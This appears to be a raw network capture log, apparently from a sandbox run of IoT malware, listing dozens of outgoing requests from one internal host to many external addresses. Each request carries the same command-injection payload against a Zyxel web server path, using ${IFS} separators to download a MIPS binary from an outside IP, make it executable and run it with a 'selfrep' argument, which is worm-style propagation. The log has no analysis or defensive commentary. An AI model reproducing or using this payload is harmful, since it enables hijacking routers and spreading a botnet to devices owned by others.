                                      Jan 14, 2024 15:50:47.313719034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4474192.168.2.1459594158.125.60.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.313766003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4475192.168.2.1457850212.126.146.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.313817024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4476192.168.2.1442148182.164.97.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.313879967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4477192.168.2.1438684125.213.118.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.313926935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4478192.168.2.1452538164.144.211.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.313976049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4479192.168.2.143971288.103.133.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314048052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4480192.168.2.143858446.87.169.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314095974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4481192.168.2.143584434.211.85.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314133883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4482192.168.2.144344099.145.37.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314167023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4483192.168.2.144749878.186.145.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314241886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4484192.168.2.1448348138.210.178.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314302921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4485192.168.2.1458856210.90.144.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314363003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4486192.168.2.143376643.53.93.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314409971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4487192.168.2.1451358179.87.225.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314460993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4488192.168.2.145907637.164.80.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314528942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4489192.168.2.1437040219.218.20.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314579010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4490192.168.2.1443602218.230.177.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314630985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4491192.168.2.1455992222.220.246.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314662933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4492192.168.2.144866619.62.119.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314722061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4493192.168.2.1436256191.101.131.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314798117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4494192.168.2.1448698178.66.167.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314838886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4495192.168.2.1437650107.81.87.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314892054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4496192.168.2.1434576202.178.212.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314929008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4497192.168.2.1452418111.42.170.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.314963102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4498192.168.2.1447668137.0.90.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315041065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4499192.168.2.1450464126.22.203.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315108061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4500192.168.2.1436576210.163.111.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315144062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4501192.168.2.1442064155.194.183.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315185070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4502192.168.2.1449292195.209.193.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315277100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4503192.168.2.1438668109.144.131.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315310001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4504192.168.2.146046257.191.11.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315354109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4505192.168.2.143820827.184.241.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315448046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4506192.168.2.1438638108.239.138.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315486908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4507192.168.2.143756462.101.195.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315524101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4508192.168.2.143506064.222.136.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315565109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4509192.168.2.144412495.48.148.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315623045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4510192.168.2.1455622165.234.30.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315686941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4511192.168.2.1439836138.29.74.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315748930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4512192.168.2.1460128196.126.102.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315814018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4513192.168.2.143860489.211.68.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315845966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4514192.168.2.1433650160.81.16.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315923929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4515192.168.2.1450664191.84.82.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.315993071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4516192.168.2.144400678.253.115.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316023111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4517192.168.2.144839012.118.24.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316051960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4518192.168.2.144793644.151.239.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316116095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4519192.168.2.143782678.118.79.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316184044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4520192.168.2.1458524212.46.253.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316226959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4521192.168.2.145401478.166.114.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316279888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4522192.168.2.145460824.192.155.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316318035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4523192.168.2.14372381.90.191.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316375971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4524192.168.2.143752494.255.50.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316415071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4525192.168.2.1439152158.154.170.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316454887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4526192.168.2.145498069.37.3.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316515923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4527192.168.2.1449378103.119.193.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316562891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4528192.168.2.144182279.24.238.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316642046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4529192.168.2.1443748196.175.57.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316695929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4530192.168.2.144643234.74.81.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316751957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4531192.168.2.1456536134.139.87.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316806078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4532192.168.2.145117636.240.175.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316864014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4533192.168.2.1444822140.147.249.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316920996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4534192.168.2.144054882.217.134.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.316992044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4535192.168.2.143512847.153.141.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317050934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4536192.168.2.144125889.73.49.17443
                                      TimestampBytes transferredDirectionData
